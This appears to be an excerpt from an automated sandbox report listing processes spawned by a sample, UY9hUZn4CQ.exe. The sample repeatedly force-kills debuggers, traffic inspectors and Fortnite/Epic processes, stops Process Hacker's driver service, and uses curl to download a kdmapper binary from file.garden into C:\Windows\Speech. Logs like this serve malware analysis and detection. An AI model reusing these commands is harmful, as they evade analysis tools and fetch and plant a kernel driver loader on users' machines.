                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\sc.exe sc stop KProcessHacker1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\sc.exe sc stop KProcessHacker3Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg64.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im OllyDbg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg64.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
